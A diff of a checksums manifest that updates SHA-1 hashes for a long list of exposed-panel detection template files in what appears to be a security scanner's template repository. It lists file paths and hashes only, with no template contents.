-http/exposed-panels/siteomat-login.yaml:abe9b1e2cc38839956295182a7b1e25b43268e44 -http/exposed-panels/skycaiji-admin-panel.yaml:08da042fb54f36b570b0113994ded8c32a24398e -http/exposed-panels/slocum-login.yaml:7ce7eb13b1463a8b64127a961374524e66d07e35 -http/exposed-panels/smartping-dashboard.yaml:da4f371cf3c29cacac17a58b453f165d2bc4a1fc -http/exposed-panels/solarview-compact-panel.yaml:291b0f2dd2153f880c010f91c16a34f6beeef6d2 -http/exposed-panels/solarwinds-orion.yaml:c5ee9d375992e32d0d24c7055c9cb477a835aae9 -http/exposed-panels/solarwinds-servuftp-detect.yaml:0fdc99b156b3f025d7da1b763ed13afd09f0e13e -http/exposed-panels/solr-panel-exposure.yaml:8bb46335be55df0a2a78d09508a425d4932fe2ab -http/exposed-panels/somansa-dlp-detect.yaml:06de620a76f92e453c050f06aeb66de918872f5f -http/exposed-panels/somfy-login.yaml:34a05a708ef3da96d2e31b943cb11920470d35f5 -http/exposed-panels/sonarqube-login.yaml:232f9d2f13dcfe388aa122b7657c62290cec5e73 -http/exposed-panels/sonic-wall-application.yaml:a7ab9efb580fe5b12bb5d1cabc2775e2248c45c7 +http/exposed-panels/shoutcast-server.yaml:fec93b9a6728facacde6f8578fdac2fbe69475d3 +http/exposed-panels/sicom-panel.yaml:1109321acabb52c48664820b011e7393f2d41076 +http/exposed-panels/sidekiq-dashboard.yaml:829b3aba839419feaa3264143b49180f29b9ac65 +http/exposed-panels/signet-explorer-dashboard.yaml:ac5528114e3ee1677a8e67d0ab860e5f8d6e8f34 +http/exposed-panels/sitecore-login-panel.yaml:50e17bd8e7eb9f7bb049c421a35456c98e14ed35 +http/exposed-panels/sitecore-login.yaml:1c3d58dafa41a80633035309b1dbf5556a96f7d4 +http/exposed-panels/sitefinity-login.yaml:777882cb7da8c98546191e4e8b8ffd71bf84e5a3 +http/exposed-panels/siteomat-login.yaml:6e62f26191d161ab3141b6bab5ce22ba14648be3 +http/exposed-panels/skycaiji-admin-panel.yaml:142cc4a63f119a567287c02c465104460e789037 +http/exposed-panels/slocum-login.yaml:eceaf110eb81eb40fcc551f99db12acf0bc5fd55 +http/exposed-panels/smartping-dashboard.yaml:b1095e26454801017cc30f369be60e6df1f87c56 +http/exposed-panels/solarview-compact-panel.yaml:f2abe48328ee100d63e7cc71f53714cec2e943c9 +http/exposed-panels/solarwinds-orion.yaml:7859bb44c607392e51ab0b913d5fc2353cbeda9a +http/exposed-panels/solarwinds-servuftp-detect.yaml:0f66dad213bc7fbd0a502992f584098b789a8acf +http/exposed-panels/solr-panel-exposure.yaml:2fa82767de22b41bad80fadb93a35bba63696bf3 +http/exposed-panels/somansa-dlp-detect.yaml:b39bcf116586f98be107dba45bb8289e1e548d26 +http/exposed-panels/somfy-login.yaml:66a6503001c18ca600bfdaea09b35265ddd85da4 +http/exposed-panels/sonarqube-login.yaml:2a18cd7567d322ebfc38041f9ba1a7b15b16990f +http/exposed-panels/sonic-wall-application.yaml:bd5f0391647f770d873d706394e3e8abf4550957 http/exposed-panels/sonic-wall-login.yaml:23fd03e3f7268b3302e62a3df9687b89bad684e5 -http/exposed-panels/sonicwall-analyzer-login.yaml:651f8610f7d61f3afc44566609113043bbbc0910 -http/exposed-panels/sonicwall-management-panel.yaml:7177a546aaef4aa44a3ed974fce464cb32df3ea3 -http/exposed-panels/sonicwall-sslvpn-panel.yaml:10768fac7db18c63bb28a9ea934d9d88161946b9 -http/exposed-panels/sophos-fw-version-detect.yaml:cc481ce4ba9bb2b263a9010ce359b28c274d17ba -http/exposed-panels/sophos-mobile-panel.yaml:81d05d99308c69f1898085eae5d867d9b6bfe94b +http/exposed-panels/sonicwall-analyzer-login.yaml:f7fc4241b2ba756340f38f6da657f1cb92d8cfe7 +http/exposed-panels/sonicwall-management-panel.yaml:fd7c8c5c8bfb92c21c6b50736aaccd9631d23946 +http/exposed-panels/sonicwall-sslvpn-panel.yaml:b18c565c0bf1fc9ad6cffbf117c5466566927fc8 +http/exposed-panels/sophos-fw-version-detect.yaml:a41cdf8a54fb3c79bc6ec33d2a96dd8e34081cca +http/exposed-panels/sophos-mobile-panel.yaml:de2a888d05e9681f516773616e66623d08038f1b http/exposed-panels/sophos-web-appliance.yaml:3d79213a014484cf9adfe377e5d58afb6feaf3f8 http/exposed-panels/spacelogic-cbus-panel.yaml:3ace23d1ced8be98108bdf7339f970c2dfc51a25 -http/exposed-panels/spark-panel.yaml:ac6d9ff50a9e9947c60e871510bfee113509d35b -http/exposed-panels/sphider-login.yaml:cccdb6cccd24358cffb74907a32a865257d2d9fe -http/exposed-panels/spiderfoot.yaml:92992a318d21b359aa011d8acadfd1b1f13663c8 -http/exposed-panels/splunk-enterprise-panel.yaml:259a9f826a6ea5aa45cd9c8f945c23a66084be4f -http/exposed-panels/splunk-login.yaml:49031cada9f04daed7b4711c987c80aaa47dc7fd +http/exposed-panels/spark-panel.yaml:6085a0691c302f633ddf4d29cd1c0b9c24a8a78d +http/exposed-panels/sphider-login.yaml:e39aa34826cf90a71abe6107b4720793ad0dd497 +http/exposed-panels/spiderfoot.yaml:05d661f485cab304f5615f28ccb5a2c767192e96 +http/exposed-panels/splunk-enterprise-panel.yaml:beab61754cd40df245febf5faf73b4568f919c21 +http/exposed-panels/splunk-login.yaml:63d1426c406e7fefd1887cc727d7ee6e1ef2b7b1 http/exposed-panels/spotweb-login-panel.yaml:93b91f4dbd82c66b8318dabb2ad938132322fa12 -http/exposed-panels/sql-monitor.yaml:c1c2959922421cce25f3f011e31625007be9e759 -http/exposed-panels/sqlbuddy-panel.yaml:3f3296380d18330a779f066d4f134eb48252a726 -http/exposed-panels/squirrelmail-login.yaml:bfded236cb2f6d5efa18b4de31115de36dfbe6fb -http/exposed-panels/sqwebmail-login-panel.yaml:4d472f9a3e5912129b037b686c283b70b2760c0c -http/exposed-panels/star-network-utility.yaml:951ca634ba378e49a9672b6f88e5e72c648667a9 -http/exposed-panels/start-element-manager-panel.yaml:a1cf7a259067b4ad659a7524b9d0edbe0d6519f4 -http/exposed-panels/steve-login-panel.yaml:de7ab027d568614895d9c316dfbb57e285771252 -http/exposed-panels/storybook-panel.yaml:0ee2dc25737edae1c8e80745b3c0b9f0524499fc -http/exposed-panels/strapi-documentation.yaml:123d1d7d71dabdecb0c1a9e5ef41ba2ef1c7eacf -http/exposed-panels/strapi-panel.yaml:cf643db2d7ae04f7bfcbed4eb68a6e18e1fbad11 -http/exposed-panels/stridercd-panel.yaml:2c6e541f5688e69ec948e58208935701d50973e1 -http/exposed-panels/submitty-login.yaml:222e3b3218e15493163da5e179ff41ee5a58cc28 -http/exposed-panels/subrion-login.yaml:4d7fd9f48d9a412cf57c08f7f0d6e4644601b810 -http/exposed-panels/sugarcrm-panel.yaml:152bc269e7112cf4911b85402684faa7903846ac -http/exposed-panels/sungrow-logger1000-detect.yaml:2ada6c076a58afec8700da513b61b8487ad821eb -http/exposed-panels/superadmin-ui-panel.yaml:13677c163ba37d0ae7813e3051eecf546578ce1e -http/exposed-panels/supermicro-bmc-panel.yaml:3dcd48da7e59fb45827f9dbdcb82f2f973147711 -http/exposed-panels/superset-login.yaml:c1bfd36912ec1146357379198d5933a8d463ce84 -http/exposed-panels/supervpn-panel.yaml:5aabd28618c7396d894c243411f8a84681de2501 -http/exposed-panels/symantec/symantec-dlp-login.yaml:f93f2f32ad727d32fdcf033d262772ac5851fa8c -http/exposed-panels/symantec/symantec-epm-login.yaml:664ef5ddc7d23416b606260c2d48953663130c47 -http/exposed-panels/symantec/symantec-ewep-login.yaml:c12467cdedce8210a2cb11d9890287d62e0c2216 +http/exposed-panels/sql-monitor.yaml:212a40c651b8ce0490c21e4ef94c5c29c65b8e99 +http/exposed-panels/sqlbuddy-panel.yaml:7307ccb1d310af851a5e51bf7ea920d218687c57 +http/exposed-panels/squirrelmail-login.yaml:d6f9bd830fb227c6c94edb0dcc73003927f69bd8 +http/exposed-panels/sqwebmail-login-panel.yaml:680e3d9611bc730418054bcf797088948dd398fa +http/exposed-panels/star-network-utility.yaml:9e85390b929bf2d53b44968de4ce6d7b3f80bbc5 +http/exposed-panels/start-element-manager-panel.yaml:688bfc937a179b3bd5a4f308b5f64eb7ca4644bc +http/exposed-panels/steve-login-panel.yaml:fa3cf4e61e512ca1952d3eaf3923c4902e8eecff +http/exposed-panels/storybook-panel.yaml:c9239546eb990a762e4924c8be19696a9b3c95c6 +http/exposed-panels/strapi-documentation.yaml:ba104e0b672621200301b05c3ec00a051b149311 +http/exposed-panels/strapi-panel.yaml:38516f73e03f8a3deda9083adf8a03e234ef316f +http/exposed-panels/stridercd-panel.yaml:099616203a52687b85d16898c7127105d66ca23a +http/exposed-panels/submitty-login.yaml:1c37ee3ec0ecaad6999d70aab9f9b849790e3ab2 +http/exposed-panels/subrion-login.yaml:bc2fef03bd048cb66d4b0391797a586ee014f3e0 +http/exposed-panels/sugarcrm-panel.yaml:4cce39ea3d3d5392df144c6339e237108675ce60 +http/exposed-panels/sungrow-logger1000-detect.yaml:774c8401adc0639a1ad0df8ab42180e515f0a57f +http/exposed-panels/superadmin-ui-panel.yaml:3d5772eddb991f1bafa5e7531266d067e2aa0b48 +http/exposed-panels/supermicro-bmc-panel.yaml:184070c4e6cccba884469692726043efde42472a +http/exposed-panels/superset-login.yaml:d06002045048bc3c4534efd8aedc36c5b9ef2d00 +http/exposed-panels/supervpn-panel.yaml:6d08b157f0216711605c9e43a6e1547783b8167e +http/exposed-panels/symantec/symantec-dlp-login.yaml:de2a533ac22f8b3aa0b917e3bc6371a5754a51a8 +http/exposed-panels/symantec/symantec-epm-login.yaml:6f91a21884850990743f2107f4b33a9618461eb6 +http/exposed-panels/symantec/symantec-ewep-login.yaml:c65b15e01b242e147392611d06a14ca4b2faba7d http/exposed-panels/symantec/symantec-iam-console.yaml:6b5f51ea0dffbcb834e8a4e5861c50e643c6bfc8 -http/exposed-panels/symantec/symantec-pgp-global-directory.yaml:3d4f1437e6b3c8dcb1b379c08e26ab11bf45f2b5 -http/exposed-panels/synapse-mobility-panel.yaml:f41ec14f15af49fe67218ecda8ec11a4d1acbacb +http/exposed-panels/symantec/symantec-pgp-global-directory.yaml:daa94b9ae8e309cc3133be930abc61573b79096e +http/exposed-panels/synapse-mobility-panel.yaml:be63433fce3df1c1eb55b27baa12d25ea1ffe80b http/exposed-panels/syncserver-panel.yaml:1b8457c7d6b0c683683afa3757c8d0df244d1963 -http/exposed-panels/syncthru-web-service.yaml:02bb50ccaf5240c2b82962554d8f608b9bd5e0bd -http/exposed-panels/synnefo-admin-panel.yaml:f74be29a50a186f60c3cb8ba3957ba38f6356865 +http/exposed-panels/syncthru-web-service.yaml:013c535b7c9aa764e56d877091158b748d143ec1 +http/exposed-panels/synnefo-admin-panel.yaml:100551e5a5e4c9e1c5195db6d94c2b4b8fbbcf4a http/exposed-panels/synology-rackstation-login.yaml:e87cb07d9c8a956e78871fbefa7a1f99dad0f46f http/exposed-panels/synopsys-coverity-panel.yaml:52abd20a94b9afe64ad254668280fc99c64e7d7c -http/exposed-panels/sysaid-panel.yaml:b1c84f8719f596ff14ad4179a0228b12f22d67d9 -http/exposed-panels/tableau-panel.yaml:44e254a879a3359f3640d422ea1ead714978698f -http/exposed-panels/tableau-service-manager.yaml:0c0e244c0531515e717d6a0c9da64e6f3c7688b6 -http/exposed-panels/teamcity-login-panel.yaml:8373385e093208fd1c6925d7067dc7036e7a19b7 -http/exposed-panels/teampass-panel.yaml:62233b3c07674686d224fb4f97b7d086e1a99a19 -http/exposed-panels/tectuus-scada-monitor.yaml:2545cbc2264f06254a4dc49719b320b7839d7b3a -http/exposed-panels/tekton-dashboard.yaml:7ece221b5175207745b67f0bffc6b11d8b36ac11 -http/exposed-panels/telerik-server-login.yaml:78ed7a8c23f56152a7db060ed5d2b9c687be1c5a -http/exposed-panels/telesquare/tlr-2005ksh-login.yaml:0547255ba2adb3f991e10cb30ad2bdfda04d23ba -http/exposed-panels/teltonika-login.yaml:622e43f99ea2a019efd667f79abcdd4637b3d33c -http/exposed-panels/tembosocial-panel.yaml:c925f1004ae9a3a61a6422c9202b485679cee981 -http/exposed-panels/temenos-t24-login.yaml:cda4fc3603203331b49748810bb5a1a1325d910d -http/exposed-panels/tenda-11n-wireless-router-login.yaml:f00e9d9b61c6bfaadf0221a7f659b40a09573b04 -http/exposed-panels/tenda-web-master.yaml:ad50ba6d3dff1e561384ea7efdb7098ef7be63b4 +http/exposed-panels/sysaid-panel.yaml:de32215ffce77b77b783f77617f0dd27b74e6a58 +http/exposed-panels/tableau-panel.yaml:f220e6cdfe2a765244f8ce3ef5069f2d0cfcd51f +http/exposed-panels/tableau-service-manager.yaml:58c7c6a532f3962525a372a95cb131adbc4a85cf +http/exposed-panels/teamcity-login-panel.yaml:a2744c78edac0a89ad906f95c9df0034aeb63a0c +http/exposed-panels/teampass-panel.yaml:75ed863b37f69e0ada3c6bc1f9c98cb4cb2ed475 +http/exposed-panels/tectuus-scada-monitor.yaml:2b4d20c48ef33723ae9a80995a7c6dc070d75107 +http/exposed-panels/tekton-dashboard.yaml:e22ddcdf582b89b3cd29f71209aa2e5d6276d0ff +http/exposed-panels/telerik-server-login.yaml:b7b12b852bd5d8933425ddbd63557fa3e3a64d04 +http/exposed-panels/telesquare/tlr-2005ksh-login.yaml:1068c229998faab2323f07390442fd31ffea331f +http/exposed-panels/teltonika-login.yaml:efc637be2745c0b7ce6d6adb88e58de81662b469 +http/exposed-panels/tembosocial-panel.yaml:4ad58856e7ecad5e343e1aa7a36bfb2adf2db7d4 +http/exposed-panels/temenos-t24-login.yaml:655f5a27947c29d2a8b15b5d49cbfd4cf6ad199c +http/exposed-panels/tenda-11n-wireless-router-login.yaml:2ab81690060ec0da3acff53e1195f37c78c2d7b5 +http/exposed-panels/tenda-web-master.yaml:ef7e7e4c1b9ded8936dd0b6e8bff405ba6b57053 http/exposed-panels/teradek-panel.yaml:0989cfd13fb91e4d130d40a5c4e5bf29caffa8a1 -http/exposed-panels/teradici-pcoip-panel.yaml:23485d5b8080a06bffcede4857f610263fc86ac1 -http/exposed-panels/terraform-enterprise-panel.yaml:98b6a43cb41c9b78ea20811940921a46398794fd -http/exposed-panels/terramaster-login.yaml:a7ae270ceb22a54a01f672680700ca2f7ff45460 -http/exposed-panels/thinfinity-virtualui-panel.yaml:8913e9c26ab24b84d65440ed8a4a84280b53ed01 -http/exposed-panels/threatq-login.yaml:d0e4b791fa342bdfbaa64d59e0ef3e78bd6f6d60 -http/exposed-panels/thruk-login.yaml:b1229321f3aebb8e1e5b8bc9b8f52d725b7decf8 +http/exposed-panels/teradici-pcoip-panel.yaml:88764f77b34dbf77f571368d1a51d3c9f15d9f6a +http/exposed-panels/terraform-enterprise-panel.yaml:c3f8723605f3fc282898b56a3b6324528a6e77d1 +http/exposed-panels/terramaster-login.yaml:bfcfc089e1d6658d01803a841960e40142d8faf6 +http/exposed-panels/thinfinity-virtualui-panel.yaml:91c419eb6efb2877087461df294a8fd643482427 +http/exposed-panels/threatq-login.yaml:cf439f9a49c10bef865bf304c4137dd23cd07f41 +http/exposed-panels/thruk-login.yaml:c6e22c616b9b32772e1f253d930dfa1fe5610fac http/exposed-panels/tigase-xmpp-server.yaml:e4c6b531888b16163c4ae94a75e1e7707b01def3 -http/exposed-panels/tikiwiki-cms.yaml:4ac7291f0fff08fe63b022728630d255357a4b44 -http/exposed-panels/tiny-file-manager.yaml:e9a738a44602a4ffaf3c0085184365711870d400 +http/exposed-panels/tikiwiki-cms.yaml:8e25249a701fe2d9210192211661f31878042c63 +http/exposed-panels/tiny-file-manager.yaml:403c644180327255c075b1449aa27f7522be29f0 http/exposed-panels/tomcat/tomcat-exposed-docs.yaml:d1ecf9592fab3e18759e2002e77d186c8c960673 -http/exposed-panels/tooljet-panel.yaml:8d7780894fcfd25ab72c22cede7cf46c5142b257 -http/exposed-panels/total-web-solutions-panel.yaml:e0437ab8575c0fe34d16ee883c669a7e6979cc7f -http/exposed-panels/totemomail-panel.yaml:bd4a8e21b5f88bc1dc7d8f8d2c04e828c20e701e -http/exposed-panels/tracer-sc-login.yaml:f2488682bd1645443b5c815d1cdbed4d5bc16a5c -http/exposed-panels/traefik-dashboard.yaml:b185cd338488c0024b5db23bc3afe3ace7af4176 -http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml:3e401f83250d3461e5bf1c1142afdd1468d5d219 -http/exposed-panels/tufin-securetrack-login.yaml:cdb189908931aded54acb7db492bfbe5215fecc5 +http/exposed-panels/tooljet-panel.yaml:3a1eb6eae1cadc835c4cc2f825e26e4fe000f3f4 +http/exposed-panels/total-web-solutions-panel.yaml:4c5c950e5907016bd3b05fc2d9cb50ea82e00517 +http/exposed-panels/totemomail-panel.yaml:3b9e77bbf53c74a6bb629304dbafa42ac01d96b3 +http/exposed-panels/tracer-sc-login.yaml:f39156c779bf49186d58943b43022b5ec82cbaae +http/exposed-panels/traefik-dashboard.yaml:a5d52e01b4b7296d7311c890d8148c5adca9e8ce +http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml:6d3290af1ef6002db26123e0cbeb4b2b40750ae5 +http/exposed-panels/tufin-securetrack-login.yaml:9e4adce05643b8d8a67e20da23f00bb2aec05474 http/exposed-panels/tup-openframe.yaml:fc5e706960c604dfff0f2a9cd352fa8c81fdb7c6 -http/exposed-panels/turnkey-openvpn.yaml:0396472972fce09f9cbdf2ea3ad1168c686898cb -http/exposed-panels/tuxedo-connected-controller.yaml:9d7aa611b6051c2aabfcdd0d5ef9edafc2cb056c -http/exposed-panels/typo3-login.yaml:0cda49b46ede824921c64adb6f9a1720e2480d5f -http/exposed-panels/umbraco-login.yaml:c0a52155f373e5622c32fa7d1bcbae445f307e87 -http/exposed-panels/unauth-xproxy-dashboard.yaml:3e496dc98ceffa3432c0692bba007a7f7ff13973 -http/exposed-panels/unauthenticated-frp.yaml:059a007581f93d3e376cb6af12b53e164e057cf2 -http/exposed-panels/unifi-panel.yaml:949f113d580ab9bb566a3b2ccca3668e6b61a164 +http/exposed-panels/turnkey-openvpn.yaml:0970b910440a2c822046345b585b7315dbe0358a +http/exposed-panels/tuxedo-connected-controller.yaml:ca596c51037ca5cbc4c37b803ef879045e79c885 +http/exposed-panels/typo3-login.yaml:8a198f33e67f3ca95a7fbe5615d7b5361b0bcd88 +http/exposed-panels/umbraco-login.yaml:2b6c64e3601668574414877a6ecf518d25c030af +http/exposed-panels/unauth-xproxy-dashboard.yaml:e5860b75d4aa73cb16c214064b966f680de1f6a6 +http/exposed-panels/unauthenticated-frp.yaml:fafae043e641aef896fac3da86b52150915281a9 +http/exposed-panels/unifi-panel.yaml:15565403173f8090b99b18f1a3e45b952c69a33b http/exposed-panels/untangle-admin-login.yaml:71adc1e01ccf9b8dff23fe8e2eabe434e307b7b8 http/exposed-panels/uptime-kuma-panel.yaml:68e10ce42466ba1d7a287c7f2530c8601e873924 -http/exposed-panels/user-control-panel.yaml:50326a70775914bead2c0239ac53725dc488b2a5 -http/exposed-panels/v2924-admin-panel.yaml:c35a6c933045f594b324e269592690b236f47aa0 -http/exposed-panels/vault-panel.yaml:03707a6899d5697afa8a742aded5e86fe852d057 -http/exposed-panels/veeam-backup-azure-panel.yaml:1d8eed0e466fa8b83f9304b5993212457bb7758e -http/exposed-panels/veeam-backup-gcp.yaml:a67c427e40a2762ad944b229c59a5b54373358b2 -http/exposed-panels/veeam-panel.yaml:a3b644bb867a9b3ed60279454b7b0e1e9d7ed4d1 +http/exposed-panels/user-control-panel.yaml:797cfaa67c53f572b6faa8eadebb4d86a3fb0352 +http/exposed-panels/v2924-admin-panel.yaml:e0345e22f0fb30b96f9e73a1f60347328b68f68b +http/exposed-panels/vault-panel.yaml:41a7078ba6d070ec28a7da18b200c28b22c0bf07 +http/exposed-panels/veeam-backup-azure-panel.yaml:ac03c69ab3ea45a8fcb8cc69af0325cade47fb97 +http/exposed-panels/veeam-backup-gcp.yaml:d566f2c8a2ac9f760ab3d33a3fdb4d225be535b8 +http/exposed-panels/veeam-panel.yaml:823fdfb037be39cfd165e299faaec3fb41585ac8 http/exposed-panels/veriz0wn-osint.yaml:485c50da6c7eb638518a84bcdfef95aaa52b0fc0 -http/exposed-panels/verizon-router-panel.yaml:9ecaf7ee4043d6a15a850377fcffae6984e97cea -http/exposed-panels/versa/versa-director-login.yaml:b4f52b024cbc5be28feb9c27f73ad991dcfb12d9 -http/exposed-panels/versa/versa-flexvnf-panel.yaml:c9cc16a182684a75874d7ca92e749955afbb16c1 -http/exposed-panels/versa/versa-sdwan.yaml:79abe87a0c84aeb80aa3c4f884778fa4e8b117d2 -http/exposed-panels/vertex-tax-panel.yaml:09a8c104d2b7865b8692bf1c466e24ed346132a4 -http/exposed-panels/vidyo-login.yaml:9789905b7ada0e79b562d8c9f433e5735625235d -http/exposed-panels/vigor-login.yaml:dc8762c6c43448fbd5319df6e269a0ea4cb06803 -http/exposed-panels/virtua-software-panel.yaml:ceac0e66af826fa0a4f9cad4d8fdc7560907cf84 -http/exposed-panels/virtual-ema-detect.yaml:d510336e92184688b5e73b21d9ed892bdeb0dcd7 -http/exposed-panels/vmware-carbon-black-edr.yaml:b9ddb078d9092d69e0e8095cc5acd9f5e2a8da9b -http/exposed-panels/vmware-cloud-availability.yaml:d75c8f097afb5700ed3af6796d2197422c2b6a58 -http/exposed-panels/vmware-cloud-director.yaml:7ada1b85ca910cefc6c1fa6a0bbecb5387bc27df -http/exposed-panels/vmware-ftp-server.yaml:e9f444d70b55af2d7dc16fdfe1f7e95d80018c64 -http/exposed-panels/vmware-hcx-login.yaml:71e79668069ffbd69140456e734918b6015ed89e +http/exposed-panels/verizon-router-panel.yaml:b11f79ef42e77a66987a6f4dbc1fb1d14908ae4d +http/exposed-panels/versa/versa-director-login.yaml:baec564ea41d8cbbf28fc9f362eb2f080f46e3ab +http/exposed-panels/versa/versa-flexvnf-panel.yaml:4bb24526a8e2b0073b907249016ae6268f14c686 +http/exposed-panels/versa/versa-sdwan.yaml:5decd6984c10be90cf3f4665ec8b988c8c1e9641 +http/exposed-panels/vertex-tax-panel.yaml:955cb29288982393ae01cc6dfd8f575de32577b8 +http/exposed-panels/vidyo-login.yaml:f2082acfc7ff004351e0a3186fa49cfa6eb99c80 +http/exposed-panels/vigor-login.yaml:6366855e53046edd19b76d80c451d185ac135318 +http/exposed-panels/virtua-software-panel.yaml:3d540df185af6af3aa9f1e75de595b0cc759e81a +http/exposed-panels/virtual-ema-detect.yaml:2527630b621470351d505cc7bdcbc5b8d32fdc28 +http/exposed-panels/vmware-carbon-black-edr.yaml:6b992382d37f1a5b41c4433f1147e2bdcb940999 +http/exposed-panels/vmware-cloud-availability.yaml:51005a82a7c126a5ac8e51ad530c598c9dfe2e5b +http/exposed-panels/vmware-cloud-director.yaml:b0da2d70d9dc34bcb2819db833c5ec1b3bd918c9 +http/exposed-panels/vmware-ftp-server.yaml:1d2192303362699cb2ec0ec90e8e97bc5ad78c38 +http/exposed-panels/vmware-hcx-login.yaml:29489baca37a096ad5bad65e9682ed3dda74a9a5 http/exposed-panels/vmware-horizon-daas.yaml:3ba513cc25ad1518d660c1e2ab06d0bb26a5196a -http/exposed-panels/vmware-horizon-panel.yaml:7b55ba1f116a7ec12a738f7b956a86abc22659c3 -http/exposed-panels/vmware-nsx-login.yaml:fd9fb16f4c13963070ae44d8a54a816a5caaa4fe -http/exposed-panels/vmware-vcenter-converter-standalone.yaml:eb5d6820ee6bd2f58592bf958401c05fb3844b44 -http/exposed-panels/vmware-vcloud-director.yaml:4e6811fd958e3e9553f39ffe96a7c3bfb78b4f34 -http/exposed-panels/vodafone-voxui-panel.yaml:e208df9ad17ec735675189a0b7e16138736f40a4 -http/exposed-panels/voipmonitor-panel.yaml:07e8229dbf5fe42781be9d9efcfee9778cf715f7 -http/exposed-panels/vrealize-loginsight-panel.yaml:ccda1a2fd1a9cfe9fa9147aa80cda5827ff8f542 -http/exposed-panels/wago-plc-panel.yaml:9c53ea7ed93d0c709afd20768868418ef71bdcf1 -http/exposed-panels/wagtail-cms-detect.yaml:71a335e93176371f47f3c603623a2298b8428406 -http/exposed-panels/wallix-accessmanager-panel.yaml:3325064abe01a317b3de5c23ae6bb9e1cbe7c1a6 -http/exposed-panels/wampserver-homepage.yaml:d850b886f9e2771451167c17cfa24b8ebe11a626 +http/exposed-panels/vmware-horizon-panel.yaml:0bb22f06d72e17539e2eedbceb8e4d3ca6d4fdd5 +http/exposed-panels/vmware-nsx-login.yaml:32120c2211865eff067b14b95458dd4566f4ab70 +http/exposed-panels/vmware-vcenter-converter-standalone.yaml:89fe09ac5c92d78a50f01b6b2e7a0745383a6a78 +http/exposed-panels/vmware-vcloud-director.yaml:2cf54da49b73ac6bb70cafd04ed08f4582483b16 +http/exposed-panels/vodafone-voxui-panel.yaml:1274022b27b716cb934309b5bb7ab77a70a8b6f7 +http/exposed-panels/voipmonitor-panel.yaml:44472c2ced172038baf4c46f23ae292957e09ead +http/exposed-panels/vrealize-loginsight-panel.yaml:62a746c39b4fe3a5e72f08238a91adb26abeb989 +http/exposed-panels/wago-plc-panel.yaml:bd25934cc437f51ba1a8943a2a72e7f253a787c5 +http/exposed-panels/wagtail-cms-detect.yaml:343ede02b2a442af18b56aff2fd57ea3dd292333 +http/exposed-panels/wallix-accessmanager-panel.yaml:770ac04abd3dc162f168bb6c3034dc67ce55ae8d +http/exposed-panels/wampserver-homepage.yaml:418d9acfbd5d3b21324c6d1a22445e9328d67e11 http/exposed-panels/watcher-panel.yaml:440ca716ee7ebb1e6807b4850f6b7bf060949272 -http/exposed-panels/watchguard-panel.yaml:f0a3a148897cdcbfc4e7ad04e5888a0e93a58c3f -http/exposed-panels/watershed-panel.yaml:7918e42652637d06a0ee666d409a31adb4132f9d +http/exposed-panels/watchguard-panel.yaml:53032eae5f4bd84da78dadd66d49eb190bd30610 +http/exposed-panels/watershed-panel.yaml:c55532fe98a6d1d73ff060e9a16b23f170117069 http/exposed-panels/wazuh-panel.yaml:b660ca00553185f41aed053ed941e24117c96c86 http/exposed-panels/wd-mycloud-panel.yaml:10ea03ac14ca740699c20005828b57b93fef5c14 -http/exposed-panels/weatherlink.yaml:71ed7232c8f220897cd120533b5df70f7a13ed24 -http/exposed-panels/weave-scope-dashboard.yaml:4d95c87da158f5b20ca175e516814d8356ca6ad6 -http/exposed-panels/web-file-manager.yaml:4b642b153e44abe1ef355988c92f2f652bf73d86 -http/exposed-panels/web-local-craft.yaml:4fe1d6955b7486867cc9ab8fc3673c0a1057ef84 -http/exposed-panels/web-service-panel.yaml:79c86e04b98ab8218b3d39cd1d74e9e241e3e59d +http/exposed-panels/weatherlink.yaml:200e25cf0bbb94a6343212164e9fb30301956c3b +http/exposed-panels/weave-scope-dashboard.yaml:02c29cac49a3505f0d90447e5a0b8aaac01b93e3 +http/exposed-panels/web-file-manager.yaml:498b6239c6249b21f80e907fb9fb481ef4744fee +http/exposed-panels/web-local-craft.yaml:7b5f4c08318e3abd3774d9a2e9353080c3934cbc +http/exposed-panels/web-service-panel.yaml:bffa6a298794c82ac165eb29d58c18ffce583f02 http/exposed-panels/web-viewer-panel.yaml:a2fff892d6eab8c672cfddffddfc9384ed44e4bb http/exposed-panels/webcomco-panel.yaml:e850b58a121aed2f4014d386b41ac383e65e80dd -http/exposed-panels/webeditors-check-detect.yaml:c7c08a960d02f30292e44c6ddfd85b12af5d0a1c -http/exposed-panels/weblogic-login.yaml:7397cce2ecbe2a216a9d6fb0c6d1117c1aed43ab -http/exposed-panels/weblogic-uddiexplorer.yaml:1199284245ff3a16e7833a0ac276933ef080af3e -http/exposed-panels/webmin-panel.yaml:114ff6103a76ce62625e2b1da4e20d81f2bff714 -http/exposed-panels/webmodule-ee-panel.yaml:ca91b653dd2adc0decd7ae93831bd00d141ab0a9 -http/exposed-panels/webpagetest-panel.yaml:915e9f5d4a4a019a4f0db03157bbc4a84f1818a9 -http/exposed-panels/webroot-login.yaml:891a4e0be5448b94d2e0fdb61f06420c1792bde9 -http/exposed-panels/webshell4-login-panel.yaml:e99ec703fc1223477963d4ef167246dc9b5f8218 -http/exposed-panels/webuzo-admin-panel.yaml:3366a8eea3862b3f7a49c8fa189c5865c42c6c12 -http/exposed-panels/weiphp-panel.yaml:8bdd2457a9596010a123d199dacd4a86a6f4a6c6 -http/exposed-panels/whm-login-detect.yaml:fdfb2bdf42c61a2086fdd63e3da2a9f1cbb011a6 -http/exposed-panels/wiren-board-webui.yaml:0e3245d18fc88c510d84ca7d5a9d75975b9a75d8 -http/exposed-panels/wmw-enterprise-panel.yaml:ce04153869fbecb42427c7a2216f3fc1fe6523c6 -http/exposed-panels/wordpress-login.yaml:deb215c0c2ea575a771eab8d63a0c7619ccad1de -http/exposed-panels/workresources-rdp.yaml:38354bf96e1f172ef81f8f8fb64451a5ca6b2f03 -http/exposed-panels/workspace-one-uem.yaml:2b7c4724f138856b4213ce5a1049063f2afcd104 -http/exposed-panels/wowza-streaming-engine.yaml:064c36e022e189f434e36f92e45c0227676d11c0 -http/exposed-panels/wso2-management-console.yaml:a922c39a6b006b59c499aa3a5054455da555c20c -http/exposed-panels/xds-amr-status.yaml:b9bfc006a04e26494b2639b28d797dc433ef6ca1 -http/exposed-panels/xeams-admin-console.yaml:5cccf47d8be6124d5e8bf029825c41e5ac9901c7 -http/exposed-panels/xenmobile-login.yaml:084f9c2f8fe645f0ce3b4e4680bfea81cbc451c7 -http/exposed-panels/xfinity-panel.yaml:d8c5b3bc5ff0877578c9f48b928fbe578ecbda8b -http/exposed-panels/xiaomi-wireless-router-login.yaml:dc17a33eaf6422774d104cf3e3d6332df864dced 